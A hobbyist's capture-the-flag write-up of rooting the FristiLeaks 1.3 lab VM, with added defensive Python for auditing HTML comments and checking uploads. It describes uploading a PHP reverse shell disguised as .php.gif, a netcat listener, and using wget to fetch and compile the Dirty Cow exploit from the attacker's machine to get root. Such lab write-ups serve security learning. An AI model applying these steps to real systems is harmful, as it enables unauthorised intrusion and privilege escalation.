CTF - FristiLeaks 1.3



Hey guys! Have been searching for some easy VMs for me to pop and found one that states it’s beginner friendly. Let’s get poppin’

RECON

Firstly, I booted the VM alongside my Kali Linux machine. Decided to check to see if viewing the VM boot process / login screen gives me an IP address. This would save me scanning for the IP address via subnet with netdiscover.

Looks like the IP address is 192.168.56.4. Sweet!

I’ll go ahead and start scanning the ports by typing in nmap -sC -sV -oA fristi 192.168.56.4. This will save all outputs in the directory that I am currently in.

After completion, let’s cat fristi.nmap to see the contents.

Excellent! So we can see a couple of things:

This tells me that port 80 is open, so I immediately open up Firefox and browse to this location.

The title says:

Keep calm and fristi

The #fristileaks doesn’t actually send me anywhere, just a Google website. Very strange that it doesn’t give me anything. I had a look at the source page to see if I could locate anything. I right click and click on view source code.

It’s given me instructions on what to do and the ETA of getting root is 4 hours!! I assume I’ll take much more than that..

NIKTO

Couldn’t find anything else, I decide to do a web scan to see if there are any directories I can dig into. I typed in nikto -h 192.168.56.4 > nikto.log. This will pipe the output into nikto.log so I can review.

Once finished, I typed less nikto.log to review the contents

Interesting points:

DIRECTORIES

Let’s have a look at those directories. I opened up Firefox and browsed to the 3 locations found in my nikto scanner.

It’s given me a meme that says “This is not the url you were looking for”. This is for all three directories. So what URL am I looking for? I typed in /wp-login /admin and a couple of others but they didn’t work. I managed to type in /fristi and that got me in!

This has given me a username and password section with a picture of Nelson from Simpsons. Could “Ha Ha” be something useful? In this section, I tried different usernames and passwords but they didn’t work.

I tried:

Let’s check out the source code to see if we can find anything interesting.

In this section, the green is commented out. It has a note that is left by someone named eezeepz. This is definitely a username! Also, in the blue, it states that they have used base64 encoding for images.

Scrolling down more, I can see that there is another green section that is commented out. This looks like base64 encoded text. Same as the blue one in the first picture. I assume that the blue correlates to the Nelson picture, but I’m not sure what this green one is.

After some googling, I found out that there is a website where I can decode base64. So I copied the green code and pasted it in the converter section (it’s the first result in Google), and clicked on decode.

It’s given me a decode.png file to download. I downloaded it and opened it.
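The decode step above can also be done offline, and the same check is useful for auditing your own pages for data left behind in HTML comments. This is an added example, not code from the original post; the function names and the sample page are constructed for illustration.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Leading bytes of the image formats we try to recognise.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}
# Base64 alphabet plus line breaks only, so ordinary prose (which has spaces) is skipped.
B64_RUN = re.compile(r"[A-Za-z0-9+/=\r\n]{40,}")


class CommentCollector(HTMLParser):
    """Collect the text of every <!-- ... --> comment in a page."""
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data)


def audit_comments(html):
    """Return (file_type, decoded_bytes) for each base64 run inside a comment."""
    parser = CommentCollector()
    parser.feed(html)
    findings = []
    for comment in parser.comments:
        for match in B64_RUN.finditer(comment):
            text = "".join(match.group().split())
            try:
                blob = base64.b64decode(text, validate=True)
            except binascii.Error:
                continue  # not valid base64 after all
            if blob:
                kind = next((n for m, n in MAGIC.items() if blob.startswith(m)), "unknown")
                findings.append((kind, blob))
    return findings


# Constructed sample: a PNG signature plus filler bytes, base64-wrapped in a comment.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 100
SAMPLE_HTML = (
    "<html><!-- TODO: remove this note before go-live -->\n"
    "<body><!--\n" + base64.encodebytes(SAMPLE_PNG).decode() + "--></body></html>"
)

if __name__ == "__main__":
    for kind, blob in audit_comments(SAMPLE_HTML):
        print(kind, len(blob), "bytes")
```

Running it over the saved source of a page before release shows which comments still carry encoded files.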

This looks like a password!! Eggggcellent….

Let’s copy and paste the username and password into the section and log in!

I’m in!! YASS! Alright, now it’s given me an upload file. This looks like something I’ve done before in my previous CTFs.

Ok, so looks like I can upload an image. Something to take note of is the upload.php. Let’s upload a test file to see if it actually uploads.

Ok, so once I uploaded a test image (pepe.jpg), it states that I have completed this. To view the image, I typed in /uploads/pepe.jpg and this is indeed correct. So we know that this is working correctly.

From my experience, I can upload a php reverse shell script to the uploads directory. After doing this, I set up a netcat listener on the port I give it. Then I launch the php script by going to /uploads/(FILE NAME) and it should give me a reverse shell on netcat. Let’s do that.

REVERSE SHELL

I have already downloaded the php-reverse-shell.php file. I edit this by going to vim php-reverse-shell.php. I edit the IP address so that it reflects to my Kali IP address (192.168.56.5) and any port (8008 lul)

I rename the script extension to .gif because it only allows extensions such as .jpg, .png and .gif. As you can see, I successfully renamed this to php-reverse-shell.php.gif

Let’s upload it now.

I now click on Upload. This has successfully uploaded. Remember, I have not activated this php script yet. To do this, I will need to browse to the pathway in the URL. But first, let’s set up a netcat listener.

I type in netcat -nvlp 8008

Alright, now this is set up, let’s go to my browser again and execute the script. I went to 192.168.56.4/fristi/uploads/php-reverse-shell.php.gif

I can see that this has executed because it is Connecting… Let’s go back to our netcat.
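From the defender's side, a server-side check that rejects the renamed file above and flags it in an existing uploads directory could look like this. It is an added example, not code from the original post or from the VM; the function names and sample bytes are assumptions made for illustration.

```python
import hashlib
import os

# Extensions the page says the form accepts, with each format's leading bytes.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def check_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means accept."""
    base, *exts = os.path.basename(filename).lower().split(".")
    if not base or not exts:
        return ["no usable name or extension"]
    reasons = []
    if len(exts) > 1:
        # Every dot-separated segment counts, not only the last one.
        reasons.append("multiple extensions: ." + ".".join(exts))
    magic = ALLOWED.get(exts[-1])
    if magic is None:
        reasons.append("extension not allowed: ." + exts[-1])
    elif not data.startswith(magic):
        reasons.append("content does not start like a ." + exts[-1] + " file")
    return reasons


def stored_name(data, ext):
    """Server-chosen name, so no client-supplied segment reaches the disk."""
    return hashlib.sha256(data).hexdigest()[:32] + "." + ext


def audit_uploads(directory):
    """Apply the same checks to files already sitting in an uploads directory."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as handle:
                reasons = check_upload(name, handle.read(16))
            if reasons:
                findings[name] = reasons
    return findings


# Constructed sample inputs: a minimal JPEG header and a harmless text stub.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_STUB = b"<?php /* constructed placeholder, no payload */ ?>"

if __name__ == "__main__":
    print(check_upload("pepe.jpg", SAMPLE_JPEG))
    print(check_upload("php-reverse-shell.php.gif", SAMPLE_STUB))
```

Storing accepted files under the name from stored_name, in a directory the web server serves as static content only, removes the dependency on the filename check alone.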

AWESOME! I’m in!!! It’s given me a shell without TTY. Let’s spawn a bash shell instead. I typed in:

import pty; pty.spawn('/bin/bash')

But it gave me an error. So I echoed the results and piped them into a file called asdf.py in the /tmp folder. From here, I can just execute the python script by typing in python /tmp/asdf.py. I love how you can go through different avenues with Linux.

Typing in id gives me the user apache.

DIRTY COW EXPLOIT

I typed in uname -a to see the version of the Linux kernel. I can see that it is using kernel version 2.6.32

I’ve been really frustrated because I didn’t know how and what to do next. My colleague was suggesting the Dirty Cow exploit as he used this to gain Admin access on one of the SANS challenges he attended this year. So after a bit of googling, I found a Dirty Cow exploit for this kernel version. Thanks Yair!

Source: https://www.exploit-db.com/exploits/40839/

Firstly, I downloaded this on my Kali box. I renamed it so it doesn’t have the extension .c as I had trouble uploading it previously. Also, I moved the exploit to /var/www/html in preparation to use the wget command.

I use wget http://192.168.56.5/exploit to download the exploit from my Kali machine onto the shell.

YES! Things are werkinggg!!

I need to rename it back to the original format so I typed mv exploit exploit.c. After this, I need to compile the exploit. So I typed in gcc -pthread exploit.c -o exploit -lcrypt. FYI, these commands were all in the instructions when I downloaded the exploit. Once this has been completed, I ran the exploit by typing in ./exploit

Great!! So let’s type in a new password: cuongpassword

After this, the instructions stated that I can now type in su firefart (that is the username that was default in the script). I’M IN!!!! YES!! This is the first time I used the Dirty Cow exploit! Can’t believe it’s so easy. Really grateful for the people that have developed this!!

After this, I typed in id, and I am definitely ROOT. I cd /root and cat fristileaks_secrets.txt and VIOALLLLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

LESSONS LEARNED

SUMMARY

Took me a very long time to complete this. There were times that I just gave up and closed my laptop and saved it for another day. But I did keep on persisting and trying. I feel really good about this box. Until next time…